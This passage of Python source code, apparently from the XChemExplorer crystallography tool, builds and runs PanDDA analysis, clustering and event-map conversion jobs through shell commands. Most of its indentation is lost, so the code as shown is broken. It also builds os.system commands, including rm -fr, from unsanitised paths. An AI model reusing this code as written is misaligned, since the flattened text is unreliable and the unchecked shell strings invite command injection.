if self.pandda_analyse_data_table.cellWidget(i, 1).isChecked():
self.Logfile.insert('Dataset selected by user -> exporting '+sample)
samples_to_export[sample]=fileModelsDict[sample]
break
else:
if sample in dbModelsDict:
try:
difference=(datetime.strptime(fileModelsDict[sample],'%Y-%m-%d %H:%M:%S') - datetime.strptime(dbModelsDict[sample],'%Y-%m-%d %H:%M:%S') )
if difference.seconds != 0:
self.Logfile.insert('exporting '+sample+' -> was already refined, but newer PanDDA model available')
samples_to_export[sample]=fileModelsDict[sample]
except ValueError:
# this will be raised if timestamp is not properly formatted;
# which will usually be the case when respective field in database is blank
# these are hopefully legacy cases which are from before this extensive check was introduced (13/01/2017)
                        advice = ( 'The pandda model of '+sample+' was changed, but it was already refined! '
                                   'This is most likely because this was done with an older version of XCE. '
                                   'If you really want to export and refine this model, you need to open the database '
                                   'with DB Browser for SQLite (sqlitebrowser.org); then change the RefinementOutcome field '
                                   'of the respective sample to "2 - PANDDA model", save the database and repeat the export procedure.' )
self.Logfile.insert(advice)
else:
self.Logfile.insert('exporting '+sample+' -> first time to be exported and refined')
samples_to_export[sample]=fileModelsDict[sample]
# update the DB:
# set timestamp to current timestamp of file and set RefinementOutcome to '2-pandda...'
if samples_to_export != {}:
select_dir_string=''
select_dir_string_new_pannda=' '
for sample in samples_to_export:
db_dict= {'RefinementOutcome': '2 - PANDDA model', 'DatePanDDAModelCreated': samples_to_export[sample]}
select_dir_string+="select_dir={0!s} ".format(sample)
select_dir_string_new_pannda+='{0!s} '.format(sample)
self.Logfile.insert('updating database for '+sample+' setting time model was created to '+db_dict['DatePanDDAModelCreated']+' and RefinementOutcome to '+db_dict['RefinementOutcome'])
self.db.update_data_source(sample,db_dict)
if os.path.isdir(os.path.join(self.panddas_directory,'rejected_datasets')):
Cmds = (
'pandda.export'
' pandda_dir=%s' %self.panddas_directory+
' export_dir={0!s}'.format(self.initial_model_directory)+
' {0!s}'.format(select_dir_string)+
' export_ligands=False'
' generate_occupancy_groupings=True\n'
)
else:
Cmds = (
'source /dls/science/groups/i04-1/software/pandda-update/ccp4/ccp4-7.0/bin/ccp4.setup-sh\n'
# 'source '+os.path.join(os.getenv('XChemExplorer_DIR'),'setup-scripts','pandda.setup-sh')+'\n'
'pandda.export'
' pandda_dir=%s' %self.panddas_directory+
' export_dir={0!s}'.format(self.initial_model_directory)+
' {0!s}'.format(select_dir_string_new_pannda)+
' generate_restraints=True\n'
)
self.Logfile.insert('running pandda.export with the following settings:\n'+Cmds)
os.system(Cmds)
return samples_to_export
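# Writes a pandda.sh script that runs pandda.analyse (in several rounds for large data sets)
# and submits it either on the local machine, via qsub on the cluster, or on a remote host.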
class run_pandda_analyse(QtCore.QThread):
def __init__(self,pandda_params,xce_logfile,datasource):
QtCore.QThread.__init__(self)
self.data_directory=pandda_params['data_dir']
self.panddas_directory=pandda_params['out_dir']
self.submit_mode=pandda_params['submit_mode']
self.pandda_analyse_data_table = pandda_params['pandda_table']
self.nproc=pandda_params['nproc']
self.min_build_datasets=pandda_params['min_build_datasets']
self.pdb_style=pandda_params['pdb_style']
self.mtz_style=pandda_params['mtz_style']
self.sort_event=pandda_params['sort_event']
self.number_of_datasets=pandda_params['N_datasets']
self.max_new_datasets=pandda_params['max_new_datasets']
self.grid_spacing=pandda_params['grid_spacing']
self.reference_dir=pandda_params['reference_dir']
self.filter_pdb=os.path.join(self.reference_dir,pandda_params['filter_pdb'])
self.wilson_scaling = pandda_params['perform_diffraction_data_scaling']
self.Logfile=XChemLog.updateLog(xce_logfile)
self.datasource=datasource
self.db=XChemDB.data_source(datasource)
self.appendix=pandda_params['appendix']
self.write_mean_maps=pandda_params['write_mean_map']
self.calc_map_by = pandda_params['average_map']
self.select_ground_state_model=''
projectDir = self.data_directory.replace('/*', '')
self.make_ligand_links='$CCP4/bin/ccp4-python %s %s %s\n' %(os.path.join(os.getenv('XChemExplorer_DIR'),
'helpers',
'make_ligand_links_after_pandda.py')
,projectDir,self.panddas_directory)
self.use_remote = pandda_params['use_remote']
self.remote_string = pandda_params['remote_string']
if self.appendix != '':
self.panddas_directory=os.path.join(self.reference_dir,'pandda_'+self.appendix)
if os.path.isdir(self.panddas_directory):
os.system('/bin/rm -fr %s' %self.panddas_directory)
os.mkdir(self.panddas_directory)
if self.data_directory.startswith('/dls'):
self.select_ground_state_model = 'module load ccp4\n'
self.select_ground_state_model +='$CCP4/bin/ccp4-python %s %s\n' %(os.path.join(os.getenv('XChemExplorer_DIR'),'helpers','select_ground_state_dataset.py'),self.panddas_directory)
self.make_ligand_links=''
def run(self):
# print self.reference_dir
# print self.filter_pdb
# how to run pandda.analyse on large datasets
#
# 1) Run the normal pandda command, with the new setting, e.g.
# pandda.analyse data_dirs=... max_new_datasets=500
# This will do the analysis on the first 500 datasets and build the statistical maps - just as normal.
#
# 2) Run pandda with the same command:
# pandda.analyse data_dirs=... max_new_datasets=500
# This will add 500 new datasets, and process them using the existing statistical maps
# (this will be quicker than the original analysis). It will then merge the results of the two analyses.
#
# 3) Repeat 2) until you don't add any "new" datasets. Then you can build the models as normal.
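        # e.g. 1200 datasets with max_new_datasets=500 -> 2 full rounds plus 1 extra round for the
        # remaining 200 datasets, i.e. 3 rounds of pandda.analyse in total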
number_of_cyles=int(self.number_of_datasets)/int(self.max_new_datasets)
if int(self.number_of_datasets) % int(self.max_new_datasets) != 0: # modulo gives remainder after integer division
number_of_cyles+=1
self.Logfile.insert('will run %s rounds of pandda.analyse' %str(number_of_cyles))
if os.path.isfile(os.path.join(self.panddas_directory,'pandda.running')):
self.Logfile.insert('it looks as if a pandda.analyse job is currently running in: '+self.panddas_directory)
msg = ( 'there are three possibilities:\n'
'1.) choose another PANDDA directory\n'
'2.) - check if the job is really running either on the cluster (qstat) or on your local machine\n'
' - if so, be patient and wait until the job has finished\n'
'3.) same as 2., but instead of waiting, kill the job and remove at least the pandda.running file\n'
' (or all the contents in the directory if you want to start from scratch)\n' )
self.Logfile.insert(msg)
return None
else:
# if os.getenv('SHELL') == '/bin/tcsh' or os.getenv('SHELL') == '/bin/csh':
# source_file=os.path.join(os.getenv('XChemExplorer_DIR'),'setup-scripts','pandda.setup-csh\n')
# elif os.getenv('SHELL') == '/bin/bash' or self.use_remote:
# source_file='export XChemExplorer_DIR="'+os.getenv('XChemExplorer_DIR')+'"\n'
# source_file+='source %s\n' %os.path.join(os.getenv('XChemExplorer_DIR'),'setup-scripts','pandda.setup-sh\n')
# else:
# source_file=''
# v1.2.1 - pandda.setup files should be obsolete now that pandda is part of ccp4
# 08/10/2020 - pandda v0.2.12 installation at DLS is obsolete
# source_file='source /dls/science/groups/i04-1/software/pandda_0.2.12/ccp4/ccp4-7.0/bin/ccp4.setup-sh\n'
source_file = ''
source_file += 'export XChemExplorer_DIR="' + os.getenv('XChemExplorer_DIR') + '"\n'
if os.path.isfile(self.filter_pdb + '.pdb'):
print('filter pdb located')
filter_pdb=' filter.pdb='+self.filter_pdb+'.pdb'
                print('will use ' + filter_pdb + ' as a filter for pandda.analyse')
else:
if self.use_remote:
stat_command = self.remote_string.replace("qsub'", str('stat ' + self.filter_pdb + "'"))
output = subprocess.Popen(stat_command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = output.communicate()
print out
if 'cannot stat' in out:
filter_pdb = ''
else:
filter_pdb = ' filter.pdb=' + self.filter_pdb + '.pdb'
else:
filter_pdb=''
os.chdir(self.panddas_directory)
# note: copied latest pandda.setup-sh from XCE2 installation (08/08/2017)
dls = ''
if self.data_directory.startswith('/dls'):
dls = (
source_file +
'\n'
'module load pymol/1.8.2.0\n'
'\n'
'module load ccp4/7.0.072\n'
'\n'
)
Cmds = (
'#!'+os.getenv('SHELL')+'\n' +
'\n' +
dls +
'cd ' + self.panddas_directory + '\n' +
'\n'
)
ignore = []
char = []
zmap = []
for i in range(0, self.pandda_analyse_data_table.rowCount()):
ignore_all_checkbox = self.pandda_analyse_data_table.cellWidget(i, 7)
ignore_characterisation_checkbox = self.pandda_analyse_data_table.cellWidget(i, 8)
ignore_zmap_checkbox = self.pandda_analyse_data_table.cellWidget(i, 9)
if ignore_all_checkbox.isChecked():
ignore.append(str(self.pandda_analyse_data_table.item(i, 0).text()))
if ignore_characterisation_checkbox.isChecked():
char.append(str(self.pandda_analyse_data_table.item(i, 0).text()))
if ignore_zmap_checkbox.isChecked():
zmap.append(str(self.pandda_analyse_data_table.item(i, 0).text()))
print ignore
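            # helper: turns a list of dataset names into a pandda.analyse keyword such as
            # ignore_datasets="x001,x002" (illustrative names); returns '' when the list is empty
            # so that the keyword is left out of the command line altogether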
def append_to_ignore_string(datasets_list, append_string):
if len(datasets_list)==0:
append_string = ''
for i in range(0, len(datasets_list)):
if i < len(datasets_list)-1:
append_string += str(datasets_list[i] + ',')
else:
append_string += str(datasets_list[i] +'"')
print(append_string)
return append_string
ignore_string = 'ignore_datasets="'
ignore_string = append_to_ignore_string(ignore, ignore_string)
char_string = 'exclude_from_characterisation="'
char_string = append_to_ignore_string(char, char_string)
zmap_string = 'exclude_from_z_map_analysis="'
zmap_string = append_to_ignore_string(zmap, zmap_string)
for i in range(number_of_cyles):
Cmds += (
'pandda.analyse '+
' data_dirs="'+self.data_directory.replace('/*','')+'/*"'+
' out_dir="'+self.panddas_directory+'"'
' min_build_datasets='+self.min_build_datasets+
' max_new_datasets='+self.max_new_datasets+
' grid_spacing='+self.grid_spacing+
' cpus='+self.nproc+
' events.order_by='+self.sort_event+
filter_pdb+
' pdb_style='+self.pdb_style+
' mtz_style='+self.mtz_style+
' lig_style=/compound/*.cif'+
' apply_b_factor_scaling='+self.wilson_scaling+
' write_average_map='+self.write_mean_maps +
' average_map=' + self.calc_map_by +
' ' +
ignore_string +' '+
char_string +' '+
zmap_string +' '+
'\n'
)
Cmds += self.select_ground_state_model
Cmds += self.make_ligand_links
Cmds += '\n'
data_dir_string = self.data_directory.replace('/*', '')
Cmds += str(
'find ' + data_dir_string +
'/*/compound -name "*.cif" | while read line; do echo ${line//"' +
data_dir_string + '"/"' + self.panddas_directory +
'/processed_datasets/"}| while read line2; do cp $line ${line2//compound/ligand_files} > /dev/null 2>&1; '
'done; done;')
Cmds += '\n'
Cmds += str(
'find ' + data_dir_string +
'/*/compound -name "*.pdb" | while read line; do echo ${line//"' +
data_dir_string + '"/"' + self.panddas_directory +
'/processed_datasets/"}| while read line2; do cp $line ${line2//compound/ligand_files} > /dev/null 2>&1; '
'done; done;')
self.Logfile.insert('running pandda.analyse with the following command:\n'+Cmds)
f = open('pandda.sh','w')
f.write(Cmds)
f.close()
# #>>> for testing
# self.submit_mode='local machine'
self.Logfile.insert('trying to run pandda.analyse on ' + str(self.submit_mode))
if self.submit_mode=='local machine':
self.Logfile.insert('running PANDDA on local machine')
os.system('chmod +x pandda.sh')
os.system('./pandda.sh &')
elif self.use_remote:
# handles remote submission of pandda.analyse jobs
submission_string = self.remote_string.replace("qsub'",
str('cd ' +
self.panddas_directory +
'; ' +
"qsub -P labxchem -q medium.q -N pandda 5 -l exclusive,m_mem_free=100G pandda.sh'"))
os.system(submission_string)
self.Logfile.insert(str('running PANDDA remotely, using: ' + submission_string))
else:
self.Logfile.insert('running PANDDA on cluster, using qsub...')
os.system('qsub -P labxchem -q medium.q -N pandda -l exclusive,m_mem_free=100G pandda.sh')
self.emit(QtCore.SIGNAL('datasource_menu_reload_samples'))
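# Clusters all datasets by crystal form with giant.datasets.cluster and writes the resulting
# crystal form name for every sample back into the database.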
class giant_cluster_datasets(QtCore.QThread):
def __init__(self,initial_model_directory,pandda_params,xce_logfile,datasource,):
QtCore.QThread.__init__(self)
self.panddas_directory=pandda_params['out_dir']
self.pdb_style=pandda_params['pdb_style']
self.mtz_style=pandda_params['mtz_style']
self.Logfile=XChemLog.updateLog(xce_logfile)
self.initial_model_directory=initial_model_directory
self.db=XChemDB.data_source(datasource)
def run(self):
self.emit(QtCore.SIGNAL('update_progress_bar'), 0)
if self.pdb_style.replace(' ','') == '':
self.Logfile.insert('PDB style is not set in pandda.analyse!')
self.Logfile.insert('cannot start pandda.analyse')
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'PDB style is not set in pandda.analyse!')
return None
if self.mtz_style.replace(' ','') == '':
self.Logfile.insert('MTZ style is not set in pandda.analyse!')
self.Logfile.insert('cannot start pandda.analyse')
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'MTZ style is not set in pandda.analyse!')
return None
# 1.) prepare output directory
os.chdir(self.panddas_directory)
if os.path.isdir('cluster_analysis'):
self.Logfile.insert('removing old cluster_analysis directory in {0!s}'.format(self.panddas_directory))
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'removing old cluster_analysis directory in {0!s}'.format(self.panddas_directory))
os.system('/bin/rm -fr cluster_analysis 2> /dev/null')
self.Logfile.insert('creating cluster_analysis directory in {0!s}'.format(self.panddas_directory))
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'creating cluster_analysis directory in {0!s}'.format(self.panddas_directory))
os.mkdir('cluster_analysis')
self.emit(QtCore.SIGNAL('update_progress_bar'), 10)
# 2.) go through project directory and make sure that all pdb files really exist
# broken links derail the giant.cluster_mtzs_and_pdbs script
self.Logfile.insert('cleaning up broken links of {0!s} and {1!s} in {2!s}'.format(self.pdb_style, self.mtz_style, self.initial_model_directory))
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'cleaning up broken links of {0!s} and {1!s} in {2!s}'.format(self.pdb_style, self.mtz_style, self.initial_model_directory))
os.chdir(self.initial_model_directory)
for xtal in glob.glob('*'):
if not os.path.isfile(os.path.join(xtal,self.pdb_style)):
self.Logfile.insert('missing {0!s} and {1!s} for {2!s}'.format(self.pdb_style, self.mtz_style, xtal))
os.system('/bin/rm {0!s}/{1!s} 2> /dev/null'.format(xtal, self.pdb_style))
os.system('/bin/rm {0!s}/{1!s} 2> /dev/null'.format(xtal, self.mtz_style))
self.emit(QtCore.SIGNAL('update_progress_bar'), 20)
# 3.) giant.cluster_mtzs_and_pdbs
self.Logfile.insert("running giant.cluster_mtzs_and_pdbs {0!s}/*/{1!s} pdb_regex='{2!s}/(.*)/{3!s}' out_dir='{4!s}/cluster_analysis'".format(self.initial_model_directory, self.pdb_style, self.initial_model_directory, self.pdb_style, self.panddas_directory))
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'running giant.cluster_mtzs_and_pdbs')
if os.getenv('SHELL') == '/bin/tcsh' or os.getenv('SHELL') == '/bin/csh':
source_file=os.path.join(os.getenv('XChemExplorer_DIR'),'setup-scripts','pandda.setup-csh')
elif os.getenv('SHELL') == '/bin/bash':
source_file=os.path.join(os.getenv('XChemExplorer_DIR'),'setup-scripts','pandda.setup-sh')
else:
source_file=''
Cmds = (
'#!'+os.getenv('SHELL')+'\n'
'unset PYTHONPATH\n'
'source '+source_file+'\n'
"giant.datasets.cluster %s/*/%s pdb_regex='%s/(.*)/%s' out_dir='%s/cluster_analysis'" %(self.initial_model_directory,self.pdb_style,self.initial_model_directory,self.pdb_style,self.panddas_directory)
)
# os.system("giant.cluster_mtzs_and_pdbs %s/*/%s pdb_regex='%s/(.*)/%s' out_dir='%s/cluster_analysis'" %(self.initial_model_directory,self.pdb_style,self.initial_model_directory,self.pdb_style,self.panddas_directory))
os.system(Cmds)
self.emit(QtCore.SIGNAL('update_progress_bar'), 80)
# 4.) analyse output
self.Logfile.insert('parsing {0!s}/cluster_analysis'.format(self.panddas_directory))
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'parsing {0!s}/cluster_analysis'.format(self.panddas_directory))
os.chdir('{0!s}/cluster_analysis'.format(self.panddas_directory))
cluster_dict={}
for out_dir in sorted(glob.glob('*')):
if os.path.isdir(out_dir):
cluster_dict[out_dir]=[]
for folder in glob.glob(os.path.join(out_dir,'pdbs','*')):
xtal=folder[folder.rfind('/')+1:]
cluster_dict[out_dir].append(xtal)
self.emit(QtCore.SIGNAL('update_progress_bar'), 90)
# 5.) update datasource
self.Logfile.insert('updating datasource with results from giant.cluster_mtzs_and_pdbs')
if cluster_dict != {}:
for key in cluster_dict:
for xtal in cluster_dict[key]:
db_dict= {'CrystalFormName': key}
self.db.update_data_source(xtal,db_dict)
# 6.) finish
self.emit(QtCore.SIGNAL('update_progress_bar'), 100)
self.Logfile.insert('finished giant.cluster_mtzs_and_pdbs')
self.emit(QtCore.SIGNAL('datasource_menu_reload_samples'))
class check_if_pandda_can_run:
# reasons why pandda cannot be run
# - there is currently a job running in the pandda directory
# - min datasets available is too low
    # - required input parameters are not complete
# - map amplitude and phase labels don't exist
def __init__(self,pandda_params,xce_logfile,datasource):
self.data_directory=pandda_params['data_dir']
self.panddas_directory=pandda_params['out_dir']
self.min_build_datasets=pandda_params['min_build_datasets']
self.pdb_style=pandda_params['pdb_style']
self.mtz_style=pandda_params['mtz_style']
self.input_dir_structure=pandda_params['pandda_dir_structure']
self.problem_found=False
self.error_code=-1
self.Logfile=XChemLog.updateLog(xce_logfile)
self.db=XChemDB.data_source(datasource)
def number_of_available_datasets(self):
counter=0
for file in glob.glob(os.path.join(self.input_dir_structure,self.pdb_style)):
if os.path.isfile(file):
counter+=1
self.Logfile.insert('pandda.analyse: found {0!s} useable datasets'.format(counter))
return counter
def get_first_dataset_in_project_directory(self):
first_dataset=''
for file in glob.glob(os.path.join(self.input_dir_structure,self.pdb_style)):
if os.path.isfile(file):
first_dataset=file
break
return first_dataset
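    # compare the atom count of every dataset PDB against the reference PDB; datasets whose
    # atom count differs are returned in mismatched_datasets (presumably so that they can be
    # cleaned up, e.g. with remove_dimple_files below, before pandda.analyse is run)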
def compare_number_of_atoms_in_reference_vs_all_datasets(self,refData,dataset_list):
mismatched_datasets=[]
pdbtools=XChemUtils.pdbtools(refData)
refPDB=refData[refData.rfind('/')+1:]
refPDBlist=pdbtools.get_init_pdb_as_list()
n_atom_ref=len(refPDBlist)
for n_datasets,dataset in enumerate(dataset_list):
if os.path.isfile(os.path.join(self.data_directory.replace('*',''),dataset,self.pdb_style)):
n_atom=len(pdbtools.get_pdb_as_list(os.path.join(self.data_directory.replace('*',''),dataset,self.pdb_style)))
if n_atom_ref == n_atom:
self.Logfile.insert('{0!s}: atoms in PDB file ({1!s}): {2!s}; atoms in Reference file: {3!s} ===> OK'.format(dataset, self.pdb_style, str(n_atom), str(n_atom_ref)))
if n_atom_ref != n_atom:
self.Logfile.insert('{0!s}: atoms in PDB file ({1!s}): {2!s}; atoms in Reference file: {3!s} ===> ERROR'.format(dataset, self.pdb_style, str(n_atom), str(n_atom_ref)))
mismatched_datasets.append(dataset)
return n_datasets,mismatched_datasets
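    # group datasets with a given reference file: a dataset is accepted if its space group
    # number matches the reference and its unit cell volume differs by less than
    # allowed_unitcell_difference_percent, i.e. |1 - V_ref/V_dataset| * 100 < tolerance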
def get_datasets_which_fit_to_reference_file(self,ref,reference_directory,cluster_dict,allowed_unitcell_difference_percent):
refStructure=XChemUtils.pdbtools(os.path.join(reference_directory,ref+'.pdb'))
symmRef=refStructure.get_spg_number_from_pdb()
ucVolRef=refStructure.calc_unitcell_volume_from_pdb()
cluster_dict[ref]=[]
cluster_dict[ref].append(os.path.join(reference_directory,ref+'.pdb'))
for dataset in glob.glob(os.path.join(self.data_directory,self.pdb_style)):
datasetStructure=XChemUtils.pdbtools(dataset)
symmDataset=datasetStructure.get_spg_number_from_pdb()
ucVolDataset=datasetStructure.calc_unitcell_volume_from_pdb()
if symmDataset == symmRef:
try:
difference=math.fabs(1-(float(ucVolRef)/float(ucVolDataset)))*100
if difference < allowed_unitcell_difference_percent:
sampleID=dataset.replace('/'+self.pdb_style,'')[dataset.replace('/'+self.pdb_style,'').rfind('/')+1:]
cluster_dict[ref].append(sampleID)
except ZeroDivisionError:
continue
return cluster_dict
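    # remove existing dimple output (the files matching pdb_style/mtz_style) for the given
    # datasets and reset the corresponding Dimple* columns in the database, so that a fresh
    # dimple run can be started for these datasets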
def remove_dimple_files(self,dataset_list):
for n_datasets,dataset in enumerate(dataset_list):
db_dict={}
if os.path.isfile(os.path.join(self.data_directory.replace('*',''),dataset,self.pdb_style)):
os.system('/bin/rm '+os.path.join(self.data_directory.replace('*',''),dataset,self.pdb_style))
self.Logfile.insert('{0!s}: removing {1!s}'.format(dataset, self.pdb_style))
db_dict['DimplePathToPDB']=''
db_dict['DimpleRcryst']=''
db_dict['DimpleRfree']=''
db_dict['DimpleResolutionHigh']=''
db_dict['DimpleStatus']='pending'
if os.path.isfile(os.path.join(self.data_directory.replace('*',''),dataset,self.mtz_style)):
os.system('/bin/rm '+os.path.join(self.data_directory.replace('*',''),dataset,self.mtz_style))
self.Logfile.insert('{0!s}: removing {1!s}'.format(dataset, self.mtz_style))
db_dict['DimplePathToMTZ']=''
if db_dict != {}:
self.db.update_data_source(dataset,db_dict)
def analyse_pdb_style(self):
pdb_found=False
for file in glob.glob(os.path.join(self.data_directory,self.pdb_style)):
if os.path.isfile(file):
pdb_found=True
break
        message=''
        if not pdb_found:
            self.error_code=1
            message=self.warning_messages()
        return message
def analyse_mtz_style(self):
mtz_found=False
for file in glob.glob(os.path.join(self.data_directory,self.mtz_style)):
if os.path.isfile(file):
mtz_found=True
break
        message=''
        if not mtz_found:
            self.error_code=2
            message=self.warning_messages()
        return message
def analyse_min_build_dataset(self):
counter=0
for file in glob.glob(os.path.join(self.data_directory,self.mtz_style)):
if os.path.isfile(file):
counter+=1
        message=''
        if counter <= self.min_build_datasets:
            self.error_code=3
            message=self.warning_messages()
        return message
def warning_messages(self):
message=''
if self.error_code==1:
message='PDB file does not exist'
if self.error_code==2:
message='MTZ file does not exist'
if self.error_code==3:
message='Not enough datasets available'
return message
class convert_all_event_maps_in_database(QtCore.QThread):
def __init__(self,initial_model_directory,xce_logfile,datasource):
QtCore.QThread.__init__(self)
self.xce_logfile=xce_logfile
self.Logfile=XChemLog.updateLog(xce_logfile)
self.initial_model_directory=initial_model_directory
self.datasource=datasource
self.db=XChemDB.data_source(datasource)
def run(self):
sqlite = (
'select'
' CrystalName,'
' PANDDA_site_event_map,'
' PANDDA_site_ligand_resname,'
' PANDDA_site_ligand_chain,'
' PANDDA_site_ligand_sequence_number,'
' PANDDA_site_ligand_altLoc '
'from panddaTable '
'where PANDDA_site_event_map not like "event%"'
)
print sqlite
query=self.db.execute_statement(sqlite)
print query
progress_step=1
if len(query) != 0:
progress_step=100/float(len(query))
else:
progress_step=1
progress=0
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
for item in query:
print item
xtalID=str(item[0])
event_map=str(item[1])
resname=str(item[2])
chainID=str(item[3])
resseq=str(item[4])
altLoc=str(item[5])
if os.path.isfile(os.path.join(self.initial_model_directory,xtalID,'refine.pdb')):
os.chdir(os.path.join(self.initial_model_directory,xtalID))
self.Logfile.insert('extracting ligand ({0!s},{1!s},{2!s},{3!s}) from refine.pdb'.format(str(resname), str(chainID), str(resseq), str(altLoc)))
XChemUtils.pdbtools(os.path.join(self.initial_model_directory,xtalID,'refine.pdb')).save_specific_ligands_to_pdb(resname,chainID,resseq,altLoc)
if os.path.isfile('ligand_{0!s}_{1!s}_{2!s}_{3!s}.pdb'.format(str(resname), str(chainID), str(resseq), str(altLoc))):
ligand_pdb='ligand_{0!s}_{1!s}_{2!s}_{3!s}.pdb'.format(str(resname), str(chainID), str(resseq), str(altLoc))
print os.path.join(self.initial_model_directory,xtalID,ligand_pdb)
else:
self.Logfile.insert('could not extract ligand; trying next...')
continue
else:
self.Logfile.insert('directory: '+os.path.join(self.initial_model_directory,xtalID)+' -> cannot find refine.pdb; trying next')
continue
if os.path.isfile(os.path.join(self.initial_model_directory,xtalID,'refine.mtz')):
resolution=XChemUtils.mtztools(os.path.join(self.initial_model_directory,xtalID,'refine.mtz')).get_high_resolution_from_mtz()
else:
self.Logfile.insert('directory: '+os.path.join(self.initial_model_directory,xtalID)+' -> cannot find refine.mtz; trying next')
continue
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'eventMap -> SF for '+event_map)
convert_event_map_to_SF(self.initial_model_directory,xtalID,event_map,ligand_pdb,self.xce_logfile,self.datasource,resolution).run()
progress += progress_step
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
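# helper class that converts a single PanDDA event map (ccp4) into an MTZ file:
# run() expands the map to P1, converts it with phenix.map_to_structure_factors,
# relabels the columns to F_ampl/PHIF with CAD and records the resulting mtz
# in the panddaTable (PANDDA_site_event_map_mtz)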
class convert_event_map_to_SF:
def __init__(self,project_directory,xtalID,event_map,ligand_pdb,xce_logfile,db_file,resolution):
self.Logfile=XChemLog.updateLog(xce_logfile)
self.event_map=event_map
if not os.path.isfile(self.event_map):
self.Logfile.insert('cannot find Event map: '+self.event_map)
self.Logfile.insert('cannot convert event_map to structure factors!')
return None
self.project_directory=project_directory
self.xtalID=xtalID
self.event_map=event_map
self.ligand_pdb=ligand_pdb
self.event=event_map[event_map.rfind('/')+1:].replace('.map','').replace('.ccp4','')
self.db=XChemDB.data_source(db_file)
self.resolution=resolution
def run(self):
os.chdir(os.path.join(self.project_directory,self.xtalID))
        # remove existing mtz file
if os.path.isfile(self.event+'.mtz'):
self.Logfile.insert('removing existing '+self.event+'.mtz')
os.system('/bin/rm '+self.event+'.mtz')
        # event maps generated with pandda v0.2 or higher have the same symmetry as the crystal,
        # but phenix.map_to_structure_factors only accepts maps in spacegroup P1;
        # therefore the map is first expanded to the full unit cell and its spacegroup set to P1.
        # other conversion options like cinvfft give, for whatever reason, uninterpretable maps
self.convert_map_to_p1()
# run phenix.map_to_structure_factors
self.run_phenix_map_to_structure_factors()
self.remove_and_rename_column_labels()
# check if output files exist
if not os.path.isfile('{0!s}.mtz'.format(self.event)):
self.Logfile.insert('cannot find {0!s}.mtz'.format(self.event))
else:
self.Logfile.insert('conversion successful, {0!s}.mtz exists'.format(self.event))
# update datasource with event_map_mtz information
self.update_database()
def calculate_electron_density_map(self,mtzin):
missing_columns=False
column_dict=XChemUtils.mtztools(mtzin).get_all_columns_as_dict()
if 'FWT' in column_dict['F'] and 'PHWT' in column_dict['PHS']:
labin=' labin F1=FWT PHI=PHWT\n'
elif '2FOFCWT' in column_dict['F'] and 'PH2FOFCWT' in column_dict['PHS']:
labin=' labin F1=2FOFCWT PHI=PH2FOFCWT\n'
else:
missing_columns=True
if not missing_columns:
os.chdir(os.path.join(self.project_directory,self.xtalID))
cmd = (
'fft hklin '+mtzin+' mapout 2fofc.map << EOF\n'
+labin+
'EOF\n'
)
self.Logfile.insert('calculating 2fofc map from '+mtzin)
os.system(cmd)
else:
self.Logfile.insert('cannot calculate 2fofc.map; missing map coefficients')
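    # builds a shell script (eventMap2sf.sh) that masks the event map around the ligand
    # (pdbset/ncsmask/mapmask/maprot) and back-transforms it with sfall into structure factors;
    # note that run() above uses convert_map_to_p1 + phenix.map_to_structure_factors instead,
    # so this script-based route appears to be an alternative/legacy pathway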
def prepare_conversion_script(self):
os.chdir(os.path.join(self.project_directory, self.xtalID))
# see also:
# http://www.phaser.cimr.cam.ac.uk/index.php/Using_Electron_Density_as_a_Model
if os.getcwd().startswith('/dls'):
            phenix_module='module load phenix\n'
else:
phenix_module=''
cmd = (
'#!'+os.getenv('SHELL')+'\n'
'\n'
+phenix_module+
'\n'
'pdbset XYZIN %s XYZOUT mask_ligand.pdb << eof\n' %self.ligand_pdb+
' SPACEGROUP {0!s}\n'.format(self.space_group)+
' CELL {0!s}\n'.format((' '.join(self.unit_cell)))+
' END\n'
'eof\n'
'\n'
'ncsmask XYZIN mask_ligand.pdb MSKOUT mask_ligand.msk << eof\n'
' GRID %s\n' %(' '.join(self.gridElectronDensityMap))+
' RADIUS 10\n'
' PEAK 1\n'
'eof\n'
'\n'
'mapmask MAPIN %s MAPOUT onecell_event_map.map << eof\n' %self.event_map+
' XYZLIM CELL\n'
'eof\n'
'\n'
'maprot MAPIN onecell_event_map.map MSKIN mask_ligand.msk WRKOUT masked_event_map.map << eof\n'
' MODE FROM\n'
' SYMMETRY WORK %s\n' %self.space_group_numberElectronDensityMap+
' AVERAGE\n'
' ROTATE EULER 0 0 0\n'
' TRANSLATE 0 0 0\n'
'eof\n'
'\n'
'mapmask MAPIN masked_event_map.map MAPOUT masked_event_map_fullcell.map << eof\n'
' XYZLIM CELL\n'
' PAD 0.0\n'
'eof\n'
'\n'
'sfall HKLOUT %s.mtz MAPIN masked_event_map_fullcell.map << eof\n' %self.event+
' LABOUT FC=FC_event PHIC=PHIC_event\n'
' MODE SFCALC MAPIN\n'
            ' RESOLUTION %s\n' %self.resolution+
            ' END\n'
            'eof\n'
            )
self.Logfile.insert('preparing script for conversion of Event map to SF')
f = open('eventMap2sf.sh','w')
f.write(cmd)
f.close()
os.system('chmod +x eventMap2sf.sh')
def run_conversion_script(self):
self.Logfile.insert('running conversion script...')
os.system('./eventMap2sf.sh')
def convert_map_to_p1(self):
self.Logfile.insert('running mapmask -> converting map to p1...')
        cmd = ( '#!'+os.getenv('SHELL')+'\n'
                '\n'
                'mapmask mapin %s mapout %s_p1.map << eof\n' %(self.event_map,self.event) +
                'xyzlim cell\n'
                'symmetry p1\n'
                'eof\n' )
self.Logfile.insert('mapmask command:\n%s' %cmd)
os.system(cmd)
def run_phenix_map_to_structure_factors(self):
        if float(self.resolution) < 1.21:  # phenix.map_to_structure_factors complains if d_min is 1.2 A or better
self.resolution='1.21'
self.Logfile.insert('running phenix.map_to_structure_factors {0!s}_p1.map d_min={1!s} output_file_name={2!s}_tmp.mtz'.format(self.event, self.resolution, self.event))
os.system('phenix.map_to_structure_factors {0!s}_p1.map d_min={1!s} output_file_name={2!s}_tmp.mtz'.format(self.event, self.resolution, self.event))
def run_cinvfft(self,mtzin):
# mtzin is usually refine.mtz
